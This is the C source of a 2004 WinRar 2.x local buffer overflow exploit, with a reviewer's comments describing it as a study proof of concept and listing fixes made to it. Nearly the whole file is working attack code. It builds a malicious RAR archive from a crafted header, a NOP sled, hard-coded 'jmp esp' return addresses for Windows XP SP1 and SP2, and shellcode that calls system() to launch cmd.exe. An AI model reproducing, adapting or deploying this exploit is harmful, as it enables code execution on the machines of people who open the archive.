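/*
 * WinRar local buffer overflow exploit V1.0
 * Coded By ATmaCA
 * Copyright ? 2004 ProGroup Software, Inc.
 * E-Mail:atmaca@prohack.net
 * Web:www.prohack.net
 * Usage:
 * exploit <Target> <OutputPath>
 * Targets:
 * 1 - WinXP SP1 user32.dll [0x77D718FC]
 * 2 - WinXP SP2 user32.dll [0x77D8AF0A]
 * Example:exploit 1 myrar.rar
 */

/*
 * All WinRar 2.x series are affected
 * 3.x series not affected
 * If you want to test and you do not have WinRar V2.x
 * You can download it from http://atmaca.prorat.net/Src/winrar.zip
 */

/*
 * Reviewer notes (2004-era proof of concept, kept for study):
 *  - Both the "jmp esp" return address and the system() address are
 *    hard-coded per service pack (English XP SP1/SP2 user32.dll and
 *    msvcrt.dll, see the usage text). They are not valid for other DLL
 *    builds; a wrong target simply crashes the vulnerable WinRar.
 *  - The output is a malicious archive. Only open it in an isolated lab
 *    on the WinRar 2.x build named above.
 *  - Fixes over the original: `int main`, the target index is range
 *    checked before it indexes `target[]`/`sysadrr[]` (the original read
 *    out of bounds for any value other than 1 or 2), every write and the
 *    final fclose() are checked, and the file layout is built from named
 *    constants instead of magic numbers.
 */

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef _WIN32
#include <conio.h> /* present in the original; not used by this file */
#endif
#ifdef __BORLANDC__
#include <mem.h>
#endif

#define NOP 0x90

/* Byte layout of the generated file (see write_exploit). */
enum {
    NOP_SLED_LEN       = 1051, /* padding from the end of the header to the saved return address */
    RET_ADDR_LEN       = 4,    /* 32-bit return address and 32-bit system() address */
    NOPS_BEFORE_SC     = 50,
    NOPS_AFTER_SC      = 50,
    SYSTEM_ADDR_OFFSET = 9     /* offset of the imm32 operand of "mov eax, <system()>" in shellcode[] */
};

/* crafted rar header */
char winrar_header[] =
    "\x52\x61\x72\x21\x1A\x07\x00\xCF\x90\x73\x00\x00\x0D\x00\x00\x00"
    "\x00\x00\x00\x00\x4A\x91\x74\x80\x80\x35\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x02\x00\x00\x00\x00\x12";

/*
 * launch a local cmd.exe
 * The 4 bytes at SYSTEM_ADDR_OFFSET are a placeholder (the SP2 value) that
 * write_exploit() overwrites with sysadrr[target] before writing the file.
 */
char shellcode[] =
    "\x68"                  /* push                                   */
    "cmd "                  /* "cmd "                                 */
    "\x8B\xC4"              /* mov eax,esp                            */
    "\x50"                  /* push eax                               */
    "\xB8\xc7\x93\xC2\x77"  /* mov eax,<system()> (patched at runtime) */
    "\xFF\xD0";             /* call eax                               */

/* return addr: address of a "jmp esp" in user32.dll */
char *target[] = {
    "\xFC\x18\xD7\x77", /* User32 jmp esp addr WinXp Sp1 */
    "\x0A\xAF\xD8\x77"  /* User32 jmp esp addr WinXp Sp2 */
};

/* address of system() in msvcrt.dll, same index as target[] */
char *sysadrr[] = {
    "\x44\x80\xC2\x77", /* 77C28044 XP Sp1 msvcrt.dll system() */
    "\xC7\x93\xC2\x77"  /* 77C293C7 XP Sp2 msvcrt.dll system() */
};

#define NUM_TARGETS (sizeof target / sizeof target[0])

_Static_assert(sizeof sysadrr / sizeof sysadrr[0] == NUM_TARGETS,
               "target[] and sysadrr[] must have one entry per target");
_Static_assert(SYSTEM_ADDR_OFFSET + RET_ADDR_LEN <= sizeof shellcode - 1,
               "system() address patch must stay inside shellcode[]");

/*
 * Write n NOP (0x90) bytes to out.
 * Returns 0 on success, -1 on the first write error.
 */
static int write_nops(FILE *out, size_t n)
{
    while (n-- > 0) {
        if (fputc(NOP, out) == EOF)
            return -1;
    }
    return 0;
}

/*
 * Write the crafted archive for the 0-based target index `targetnum` to `out`.
 *
 * Layout, in order:
 *   RAR header | NOP_SLED_LEN NOPs | return address (jmp esp) |
 *   NOPS_BEFORE_SC NOPs | shellcode (system() address patched in) |
 *   NOPS_AFTER_SC NOPs
 *
 * The return address overwrites the saved EIP with a "jmp esp" located in
 * user32.dll, which lands in the NOPs preceding the shellcode.
 *
 * Side effect: patches the global shellcode[] in place with sysadrr[targetnum].
 * Returns 0 on success, -1 if `out` is NULL, the index is out of range, or a
 * write fails (the file is then incomplete and should be discarded).
 */
static int write_exploit(FILE *out, int targetnum)
{
    if (out == NULL || targetnum < 0 || (size_t)targetnum >= NUM_TARGETS)
        return -1;

    const size_t hdr_len = sizeof winrar_header - 1; /* drop the string NUL */
    const size_t sc_len  = sizeof shellcode - 1;

    if (fwrite(winrar_header, 1, hdr_len, out) != hdr_len)
        return -1;

    /* stuff in a couple of NOPs */
    if (write_nops(out, NOP_SLED_LEN) != 0)
        return -1;

    /* EIP: overwrite the return address with the "jmp esp" address */
    if (fwrite(target[targetnum], 1, RET_ADDR_LEN, out) != RET_ADDR_LEN)
        return -1;

    if (write_nops(out, NOPS_BEFORE_SC) != 0)
        return -1;

    /* system() address for this target, then the payload itself */
    memcpy(shellcode + SYSTEM_ADDR_OFFSET, sysadrr[targetnum], RET_ADDR_LEN);
    if (fwrite(shellcode, 1, sc_len, out) != sc_len)
        return -1;

    if (write_nops(out, NOPS_AFTER_SC) != 0)
        return -1;

    return 0;
}

/* Print the banner and usage text (original wording preserved). */
static void usage(void)
{
    printf("\r\nWinRar local buffer overflow exploit V1.0\r\n");
    printf("Coded By ATmaCA\r\n");
    printf("Copyright ? 2004 ProGroup Software, Inc.\r\n");
    printf("E-Mail:atmaca@prohack.net\r\n");
    printf("Web:www.prohack.net\r\n\r\n");
    printf("Usage:\r\nexploit <Target> <OutputPath>\r\n\r\n");
    printf("Targets:\n");
    printf("1 - WinXP SP1 english user32.dll [0x77D718FC]\n");
    printf("2 - WinXP SP2 english user32.dll [0x77D8AF0A]\n");
    printf("Example:exploit 1 myrar.rar\n");
}

/*
 * Entry point: exploit <Target> <OutputPath>
 * <Target> is a 1-based index into target[]; it is parsed with strtol and
 * rejected unless it is exactly 1..NUM_TARGETS.
 * Exit status is EXIT_SUCCESS only if the whole file was written and closed.
 */
int main(int argc, char *argv[])
{
    if (argc < 3) {
        usage();
        return EXIT_FAILURE;
    }

    errno = 0;
    char *end = NULL;
    long t = strtol(argv[1], &end, 10);
    if (end == argv[1] || *end != '\0' || errno == ERANGE ||
        t < 1 || t > (long)NUM_TARGETS) {
        fprintf(stderr, "Invalid target \"%s\": expected 1-%zu\n",
                argv[1], NUM_TARGETS);
        return EXIT_FAILURE;
    }

    FILE *di = fopen(argv[2], "wb");
    if (di == NULL) {
        printf("Error opening file!\n");
        return EXIT_FAILURE;
    }

    int rc = write_exploit(di, (int)(t - 1));
    /* fclose flushes; a failure here means the file on disk is incomplete */
    if (fclose(di) == EOF)
        rc = -1;

    if (rc != 0) {
        fprintf(stderr, "Error writing file %s\n", argv[2]);
        return EXIT_FAILURE;
    }

    printf("Exploit rar file %s has been generated!\n", argv[2]);
    return EXIT_SUCCESS;
}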